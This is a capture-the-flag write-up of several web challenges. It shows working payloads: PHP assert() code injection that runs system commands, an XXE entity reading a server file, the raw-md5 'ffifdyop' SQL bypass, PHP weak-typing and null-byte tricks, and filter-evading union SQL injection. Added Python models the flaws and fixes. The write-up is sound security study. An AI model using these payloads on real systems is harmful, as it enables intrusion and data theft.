babyphp
First, look at the source code.
At the start I naively tacked ?page=flag onto the URL. Of course nothing was displayed, but it tells us a flag.php exists.
I also saw a .git directory, which means source code disclosure; I used someone else's git-dump tool to recover the source.
In it you can see the flag.php we want, but opening it directly gives no flag, of course.
From index.php we get the code that does the check:
<?php
if (isset($_GET['page'])) {
    $page = $_GET['page'];      // fully attacker-controlled
} else {
    $page = "home";
}
$file = "templates/" . $page . ".php";
// assert() with a string argument evaluates that string as PHP code (PHP 5 and 7,
// removed in PHP 8). $file is interpolated into the string unescaped, so a single
// quote in $page breaks out of the strpos() literal and the rest is executed.
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!");
?>
Seeing assert() evaluating a string means code execution, so we can use it to read flag.php.
After several tests (and a look at other writeups) the payload is: ?page=flag'.system("ls").'
This makes templates/flag'.system("ls").'.php the first argument of strpos():
$file = "templates/" . "flag'.system(\"ls\").'" . ".php";
and the code that assert() evaluates becomes
strpos('templates/flag'.system("ls").'.php', '..') === false
The injected ' closes the string literal, the . concatenates the output of system("ls"), and the trailing ' reopens the literal so that .php', '..') === false still parses. system() runs before strpos() ever sees the result, and because "ls" contains no .., the check passes.
This lists all the files; then use cat in the same way to read flag.php and get the flag from its source.
Takeaway: work out exactly how your input is spliced into the code before building the payload.
admin
No ideas. Capturing the traffic showed nothing useful, so I scanned the web directory.
And there really was something...
Saw the cute robots.txt, went in and had a look:
hint: the /admin_s3cr3t.php page
It hands out a flag directly, and I thought I would have to keep digging.
OK, I was fooled... Wrong Answer. Tried, tried, tried.
Then I captured the request again and changed the admin value on the next line, which gives the real flag.
localhost
The client IP address can be forged: the server checks a value it takes from the request.
PORT51
Very naively I tried http://web.jarvisoj.com:51/
What is actually meant is connecting from a public IP with source port 51, not changing the destination port.
This command does it:
curl --local-port 51 http://web.jarvisoj.com:32770/
--local-port binds the client socket to port 51. On Linux/macOS binding a port below 1024 needs root, so run it with sudo, and a NAT router in between may rewrite the source port, which is why a machine with a public IP is needed.
But the server seemed to be having problems and did not give the flag.
LOGIN
At first I missed the hint in the response and even went brute-forcing... awkward laugh.
It was also the first time I learned about md5($pass, true).
For the principle see https://www.freebuf.com/column/150063.html, excellently written!
With the second argument true, md5() returns the 16 raw digest bytes instead of a hex string. If those bytes are spliced straight into the SQL string, any quote among them becomes SQL. md5("ffifdyop") begins with the bytes 27 6f 72 27 36, that is 'or'6, so the clause turns into pass=''or'6...' and MySQL evaluates '6...' as the number 6, which is true.
Enter ffifdyop to get the flag.
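As an added example (not part of the original writeup), here is the md5($pass, true) splice modelled in Python. It assumes the back end builds the query with plain string concatenation; the table and column names are made up, since the page does not show the challenge's SQL.

```python
import hashlib

# Added example (not from the original writeup). Models what the LOGIN challenge
# implies: md5($pass, true) returns the raw 16-byte digest and the back end
# splices it straight into the SQL string. Table and column names are made up.
QUERY_TEMPLATE = "SELECT * FROM admin WHERE pass='{digest}'"


def raw_md5(password: str) -> bytes:
    """Equivalent of PHP md5($pass, true): the raw digest bytes, not hex."""
    return hashlib.md5(password.encode()).digest()


def build_query(password: str) -> str:
    """Splice the raw bytes into the query as an unescaped PHP string would.
    latin-1 maps each byte to exactly one character, so every byte survives."""
    return QUERY_TEMPLATE.format(digest=raw_md5(password).decode("latin-1"))


def injects_or(password: str) -> bool:
    """Does the raw digest turn the WHERE clause into ... pass=''or'<digit>...'?

    Conditions: the digest starts with the four bytes 'or', the next byte is a
    digit 1-9 (MySQL coerces the string '6...' to 6, which is true), and no
    further quote appears in the remaining bytes, which would only break the
    syntax instead of bypassing the check."""
    d = raw_md5(password)
    return (d.startswith(b"'or'")
            and d[4:5].isdigit() and d[4:5] != b"0"
            and b"'" not in d[5:])


def hardened_query(password: str) -> tuple:
    """What the back end should do instead: hex output (only [0-9a-f], never a
    quote) and a parameterised query, so the hash is data, not SQL.
    (md5 is still a poor password hash; this only removes the injection.)"""
    digest_hex = hashlib.md5(password.encode()).hexdigest()
    return ("SELECT * FROM admin WHERE pass=%s", (digest_hex,))


if __name__ == "__main__":
    print(raw_md5("ffifdyop").hex())   # 276f722736c95d99e921722cf9ed621c
    print(build_query("ffifdyop"))
    print(injects_or("ffifdyop"), injects_or("admin"))
```

injects_or() is the check you would run over a candidate list; ffifdyop is simply the best-known string whose raw digest starts with 'or' followed by a digit, and any other string passing the same test works as well.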
神盾局的秘密 (S.H.I.E.L.D.'s Secret)
Inspecting the page elements shows the image is loaded from src="showimg.php?img=c2hpZWxkLmpwZw==" (the base64 of shield.jpg),
so I guessed an arbitrary file read.
Reading index.php the same way (base64-encoding the file name) gave the source.
It should be exploited through deserialization; first look at the definition of the Shield class in shield.php.
Next comes constructing the serialized field.
After my rather clumsy construction, got it~ (the flag is visible in the page source).
WEB?
When I first saw the login box I thought it was SQL injection... packet capture showed no hint either.
Reading the page source I found nothing... other writeups said the problem is in app.js.
Copy the page and search in app.js.
Then look at checkpass().
A system of 25 linear equations in 25 unknowns, hahaha. Solving it by hand is out of the question, so use Python.
# the 25 solved unknowns: each is the ASCII code of one flag character
data = [81,87,66,123,82,51,97,99,55,95,49,115,95,105,110,116,101,114,101,115,116,105,110,103,125]
flag = ''
for i in data:
    flag += chr(i)
print(flag)  # QWB{R3ac7_1s_interesting}
Closing thought: I always assumed the page's JavaScript was not worth reading; that was ignorance on my part.
Sorry, another blind spot in my knowledge.
api调用 (API call)
Is it command injection or code injection? According to the writeup, the title points at XXE.
I had studied the XXE vulnerability recently, but only the principle, never in practice.
An <!ENTITY name SYSTEM "..."> declaration inside the DTD (the part ending in ]>) references an external file, and the parser substitutes the file's contents wherever &name; appears.
1. In the captured request, change the Content-Type to application/xml.
2. Inject the XML: following the hint, read the file with a SYSTEM entity.
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xdsec [
<!ELEMENT methodname ANY >
<!ENTITY xxe SYSTEM "/home/ctf/flag.txt" >]>
<methodcall>
<methodname>&xxe;</methodname>
</methodcall>
I found the XML in a writeup... I could not have written it myself.
In a mess
Right-click to view the source; the hint is index.phps.
Get the code from index.phps:
<?php
error_reporting(0);
echo "<!--index.phps-->";
if(!$_GET['id'])                      // "0a" is truthy, so no redirect
{
    header('Location: index.php?id=1');
    exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))                   // no '.' allowed in $a, so no file names
{
    echo 'Hahahahahaha';
    return ;
}
$data = @file_get_contents($a,'r');   // $a may be a stream wrapper such as php://input
// $id==0 is a loose comparison; eregi() is a C-string regex, truncated at a null byte
if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
    require("flag.txt");
}
else
{
    print "work harder!harder!harder!";
}
?>
The key part is:
$data = @file_get_contents($a,'r');
if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
id: weak-type bypass. "0a" is truthy, so the redirect is skipped, yet "0a"==0 is true under PHP 7's loose comparison (the string is cast to 0; PHP 8 no longer does this). a: the php://input pseudo-protocol makes file_get_contents() return the raw POST body, and it contains no '.', so the stripos() check passes. b: eregi() is bypassed with a leading null byte. The pattern "111".substr($b,0,1) becomes "111\0", which the C regex engine truncates to "111", and that matches "1114"; meanwhile substr($b,0,1) is "\0", not 4, and strlen($b) is 7 > 5.
So the payload is:
?a=php://input&id=0a&b=%004qqqqq
POST body: 1112 is a nice lab!
Once inside, the page is reached with ?id=1. SQL injection?
Add a single quote and see. Judging from the payloads that work, union/select/from and spaces are stripped in a single pass, so double-write the keywords (uniunionon becomes union once the inner copy is removed) and use /*h*/ inline comments in place of spaces.
Get the database name.
Get the table names:
?id=-1/*h*/uniunionon/*h*/seselectlect/*h*/1,2,(seselectlect/*h*/group_concat(table_name)/*h*/frofromm/*h*/information_schema.tables/*h*/where/*h*/table_schema=database())#
Get the column names; note that the table name has to be hex-encoded, since quotes are not usable here:
?id=-1/*h*/uniunionon/*h*/seselectlect/*h*/1,2,(seselectlect/*h*/group_concat(column_name)/*h*/frofromm/*h*/information_schema.columns/*h*/where/*h*/table_name=0x636f6e74656e74)#
Read the content:
?id=-1/*h*/uniunionon/*h*/seselectlect/*h*/1,2,(selselectect/*h*/context/*h*/frofromm/*h*/content)%23
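The single-pass keyword filter these payloads imply, modelled as an added example (not the challenge's code, which the page does not show). The blocked list union/select/from, the space removal and the single str_replace-style pass are assumptions drawn from what the payloads double-write; the example builds the column-name query from its pieces and shows what reaches MySQL after filtering.

```python
import re

# Assumed filter (the challenge's real source is not on the page): one pass that
# deletes each blocked keyword, then deletes spaces. Only what the payloads above
# double-write is assumed to be blocked.
BLOCKED = ("union", "select", "from")
SPACE = "/*h*/"   # inline comment used in place of the stripped space


def naive_filter(user_input: str) -> str:
    """One deletion pass per keyword (like a single str_replace), then strip spaces."""
    out = user_input
    for kw in BLOCKED:
        out = re.sub(re.escape(kw), "", out, flags=re.IGNORECASE)
    return out.replace(" ", "")


def filter_until_stable(user_input: str) -> str:
    """Re-run the filter until nothing changes. This defeats double-writing but
    is still a blacklist; the real fix is a parameterised query."""
    prev, cur = None, user_input
    while cur != prev:
        prev, cur = cur, naive_filter(cur)
    return cur


def double_write(kw: str, cut: int) -> str:
    """Split kw at `cut` and insert a full copy: ('union', 3) -> 'uniunionon'.
    The single pass removes the inner copy and the two halves join back up."""
    return kw[:cut] + kw + kw[cut:]


def hex_literal(s: str) -> str:
    """MySQL hex literal, so the string needs no quotes: 'content' -> 0x636f6e74656e74."""
    return "0x" + s.encode().hex()


def columns_payload(table: str) -> str:
    """The column-name query from the writeup, assembled from the pieces above."""
    union = double_write("union", 3)
    select = double_write("select", 2)
    frm = double_write("from", 3)
    parts = ["-1", union, select, "1,2,(" + select, "group_concat(column_name)",
             frm, "information_schema.columns", "where",
             "table_name=" + hex_literal(table) + ")#"]
    return SPACE.join(parts)


def as_mysql_sees(filtered: str) -> str:
    """MySQL treats /*...*/ as whitespace, so this is the effective query text."""
    return re.sub(r"/\*.*?\*/", " ", filtered)


if __name__ == "__main__":
    p = columns_payload("content")
    print(p)                                   # the payload as sent
    print(as_mysql_sees(naive_filter(p)))      # what the database executes
    print(repr(filter_until_stable(p)))        # the iterated filter eats the keywords
```

The cut positions (3, 2, 3) reproduce the writeup's exact spellings, but any split works as long as the inner copy is the first match the filter sees. filter_until_stable() shows why the double-write trick is specific to single-pass filters, and also why chasing keywords is the wrong defence: the remaining query is still concatenated user input.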